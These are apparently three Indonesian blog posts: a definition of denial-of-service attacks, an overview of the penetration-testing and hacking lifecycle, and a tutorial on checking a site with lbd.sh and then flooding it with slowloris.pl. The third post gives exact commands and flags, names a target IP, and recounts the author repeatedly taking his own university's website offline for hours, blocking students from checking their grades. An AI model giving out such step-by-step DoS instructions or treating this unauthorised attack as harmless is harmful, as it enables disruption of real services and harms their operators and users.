./dev/sda /tmp/backtrack, Google.dork, Networking, Ppentest, Win Security

Pengertian DoS

Serangan DoS (denial-of-service attacks’) adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses layanan dari komputer yang diserang tersebut.

Dalam sebuah serangan Denial of Service, si penyerang akan mencoba untuk mencegah akses seorang pengguna terhadap sistem atau jaringan dengan menggunakan beberapa cara, yakni sebagai berikut:

Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang dari pengguna yang terdaftar menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini disebut sebagai traffic flooding.
Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding.
Mengganggu komunikasi antara sebuah host dan kliennya yang terdaftar dengan menggunakan banyak cara, termasuk dengan mengubah informasi konfigurasi sistem atau bahkan perusakan fisik terhadap komponen dan server.

Bentuk serangan Denial of Service pada awalnya adalah serangan SYN Flooding Attack, yang pertama kali muncul pada tahun 1996 dan mengeksploitasi terhadap kelemahan yang terdapat di dalam protokol Transmssion Control Protocol (TCP).

Serangan-serangan lainnya akhirnya dikembangkan untuk mengeksploitasi kelemahan yang terdapat di dalam sistem operasi, layanan jaringan atau aplikasi untuk menjadikan sistem, layanan jaringan, atau aplikasi tersebut tidak dapat melayani pengguna, atau bahkan mengalami crash.

Beberapa tool yang digunakan untuk melakukan serangan DoS pun banyak dikembangkan setelah itu (bahkan beberapa tool dapat diperoleh secara bebas), termasuk di antaranya Bonk, LAND, Smurf, Snork, WinNuke, dan Teardrop.

Meskipun demikian, serangan terhadap TCP merupakan serangan DoS yang sering dilakukan. Hal ini disebabkan karena jenis serangan lainnya (seperti halnya memenuhi ruangan hard disk dalam sistem, mengunci salah seorang akun pengguna yang valid, atau memodifikasi tabel routing dalam sebuah router) membutuhkan penetrasi jaringan terlebih dahulu, yang kemungkinan penetrasinya kecil, apalagi jika sistem jaringan tersebut telah diperkuat.

Advertisements
Standard
Ppentest, Win Security

Pentest

PenTest secara umum merupakan singkatan dari Penetration Test… Artinya (menurut Wikipedia dengan sedikit perubahan) adalah suatu metode untuk mengevaluasi keamanan sistem komputer atau jaringan dengan mensimulasikan serangan yang mungkin terjadi dari pihak yang tidak bertanggung jawab (misalnya Black Hat Hacker ataupun kracker)…

Jadi, secara garis besar, kegiatan PenTest merupakan kegiatan yang memiliki etika yang baik, dengan keadaan yang terbuka dan dilakukan oleh para White Hat Hacker untuk mencoba masuk ke dalam sistem dengan menggunakan berbagai teknik yang mungkin dapat dilakukan / dicoba oleh para Black Hat Hacker maupun kracker… sifatnya lebih ke defensive purpose (mencoba menyerang, kemudian memberitahukan letak celah untuk diperbaiki oleh pemilik sistem yang bersangkutan)…

Di dalam PenTest, pasti akan terdengar lagi istilah PenTester… Dari namanya, pasti sudah dapat ketebak yach ini apa… yach, PenTester ini merupakan pemainnya, pemain dari kegiatan PenTest…PenTester ini biasanya White Hat Hacker… Orang-Orang yang bekerja pada suatu instansi tertentu yang berada di bawah surat perjanjian untuk tidak membocorkan informasi apapun yang ada pada kegiatan PenTest… namun, tidak menutup kemungkinan bahwa pelaku kegiatan PenTest ini bisa juga dari kalangan Black Hat ataupun Grey Hat… terkadang, ada alasan tersendiri dari suatu instansi untuk memakai tenang yang seperti ini (semua kembali kepada kebijakan masing-masing)…

Nah, menurut salah satu penyelenggara sertifikasi yang berhubungan dengan Hacking (EC – Cou***l), pada umumnya, kegiatan Hacking dilakukan melalui life cycle seperti ini:

1. Reconnaissance
–> lebih ke arah Information Gathering… Terbagi menjadi 2, ada aktif, ada pula pasif…
–> Untuk Pasif : pencarian dilakukan dengan tidak berhubungan langsung dengan target, seperti melalui InterNet…
–> Untuk Aktif : pencarian dilakukan langsung dengan berhubungan dengan target… Biasanya dikenal dengan sebutan Social Engineering… Ingat Kevin Mitnick…

2. Scanning
–> lebih ke arah vulnerability scanning… pencarian kelemahan dari sistem yang sedang dites…

3. Gaining Access
–> lebih ke arah mencoba untuk mengambil alih sistem yang sedang dites…

4. Maintaining Access
–> lebih ke arah meninggalkan jejak tersembunyi, sebagai contoh, meletakan backdoor… pastinya, seorang Attacker tidak ingin bersusah payah lagi mengambil alih sistem yang telah berhasil diterobos… Bisa saja keesokan harinya, sang administrator telah menge-patch sistemnya, sehingga Attacker tidak dapat lagi masuk lewat celah yang sama…

5. Clearing Tracks
–> Seorang Attacker pastinya tidak ingin aktivitas Hacking mereka berujung di penjara, jadi, mereka pasti menghapus jejak mereka setelah meletakan pintu masuk lewat belakang dan setelah mereka utak-atik sistem yang berhasil diterobos…

Nah, ini merupakan gambaran Hacking yang biasa dilakukan seorang Attacker… namun, untuk kegiatan PenTest resmi, biasanya hanya sampai Gaining Access… setelah berhasil mencapai tahap 3, maka pekerjaan mereka telah dinyatakan selesai untuk setiap celah yang ditemukan…

Standard
./dev/sda /tmp/backtrack, Ppentest

DDos attack lagiii

Nah sekarang kita coba gunakan LBD dan Slowloris…
pertama saya sarankan jangan terlalu sering main beginian kasian karena merugikan..kemarin² saya kesal dengan kampus saya karena sudah ipk jelek pemberitahuan remedialpun ga jelas , di undur lah, nilai belum fix lah, udah tau saya mahasiswa goblok d bikin susah lagi..mana bayar 26rb/mata kuliah 😥 …jadi curhat wkwkwk…

oke, pertama gunakan lbd.sh untuk cek load balancing pada web caranya :

– Buka terminal ( ctrl + t )
– ketik cd Desktop ( tempat menyimpan kedua tools/file tadi )
– jalankan lbd.sh dengan perintah ./lbd.sh
– jika permision denied ketik dulu chmod 755 lbd.sh lalu coba lagi ketik ./lbd.sh
– jika berhasil langsung ketik ./lbd.sh example.com bisa juga dengan menggunakan ip web tsb caranya ping dulu
( ping http://www.example.com ) nanti ada ip yg muncul…
– tunggu hingga selesai dan lihat apakah menggunakan load balancing atau tidak jika tidak output akhir yg saya dapatkan seperti ini :

Checking for HTTP-Loadbalancing [Diff]: NOT FOUND

203.130.232.49 does NOT use Load-balancing.

berarti kita lanjutkan ke slowloris…. 🙂

– ketik pada terminal cd Desktop ( jika sudah langsung saja )
– ./slowloris.pl -dns [target] -port 80 -timeout 500 -num 500 -tcpto 5 -httpready
*selama melakukan dos terminal jangan d close
– tapi jika ingin lebih mantap silahkan pahami kutipan yang saya dapat dari http://forum.indonesianbacktrack.or.id/

keterangan :

* -dns : the target ( dapat berupa IP atau domain )

* -port : port yg di gunakan oleh webserver ( 80 )

* -timeout: nilai waktu delay timeout untuk setiap paket thread, penantian reacquiring ruang tcp di server. pada langkah pengetesan, Nilai ini diisi dengan flag -test

* -num : jumlah soket yang digunakan untuk mendapatkan koneksi.Biasanya server apache akan membutuhkan nilai antara 400-600 atau tergantung pada konfigurasi

* -tcpto : TCP Timeout.

* -httpready: HTTPReady di gunakan apache untuk buffer connections. attacker dapat melewati perlindungan ini dengan mengirimkan permintaan POST bukan GET atau HEAD.

untuk mengetahui limit timeoout gunakan perintah
./slowloris.pl -dns [ip/webdomain target] -port 80 -test
tunggu sampai mememukan limit timeoutnya

saya mencoba dengan timeout 500 dan num 700, berhasil web tidak bisa d buka , tapi tidak lama kemudian bisa lagi 😦
dan sayapun memutuskan untuk iseng, timeout saya kasih 500 dan num 5000 wkwk hasilnya memuaskan,,
beberapa jam web tidak bisa d buka, (dengan catatan jika web sudah terbuka lagi saya ulangi lagi slowlorisnya)..otomatis yang mau login melihat nilai harus tertunda…itu hanya sebagai pengalaman saja 🙂
mungkin di postingan berikutnya saya akan share videonya karena mungkin kata2 saya ada yg tidak di mengerti atau berbelit2 mohon

Standard